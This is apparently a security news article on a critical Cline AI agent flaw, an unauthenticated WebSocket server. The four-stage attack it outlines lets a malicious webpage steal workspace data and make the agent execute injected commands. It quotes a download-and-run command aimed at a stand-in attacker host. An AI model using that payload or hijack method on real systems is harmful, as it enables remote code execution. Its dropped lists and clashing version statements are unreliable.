Carrying a CVSS v3.1 score of 9.3 (Critical), the flaw affects all versions before v2.13.0 and has no patch available as of publication.
The kanban package starts a WebSocket server 127.0.0.1:3484 with zero Origin header validation.
Unlike standard HTTP requests, WebSocket connections bypass browser CORS protections entirely, meaning any malicious webpage can silently connect to the local server without restriction.
The attack unfolds in four stages:
/api/runtime/ws and instantly receives workspace data, including filesystem paths, git branch names, task titles, and live AI agent chat messagestask_sessions_updated events, exposing active agent session IDs and process IDs/api/terminal/io, injects an arbitrary shell command (e.g., curl https://attacker.com/shell.sh | bash), and the AI agent executes it as a user command/api/terminal/control endpoint lets attackers kill any running agent session with a simple {"type": "stop"} messageAll three vulnerable endpoints require zero authentication and perform no Origin validation.
The attack roots in two weaknesses: CWE-306 (Missing Authentication for Critical Function) and CWE-1385 (Missing Origin Validation in WebSockets).
The researcher confirmed the exploit across macOS, Linux, and Windows on Firefox, Chrome, and Arc browsers and published a full proof-of-concept alongside the disclosure.
The vulnerability compromises all three pillars of security:
Until a patched version is released, the researcher recommends three mitigations the Cline team should implement:
Developers running Cline v2.13.0 or earlier with the kanban feature enabled should avoid running the kanban server in untrusted network environments until an official fix is released.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
The post Critical Cline AI Agent Vulnerability Enables Remote Code Execution Attacks appeared first on Cyber Security News.
Migrants, many fleeing violence in Haiti, cross the Rio Grande at Del Rio, Texas, in…
Former Tekken director, Katsuhiro Harada, has established his own game development company, VS Studio. Drawing…
Forget the hero you know – this is your chance to step into the shadows…
This website uses cookies.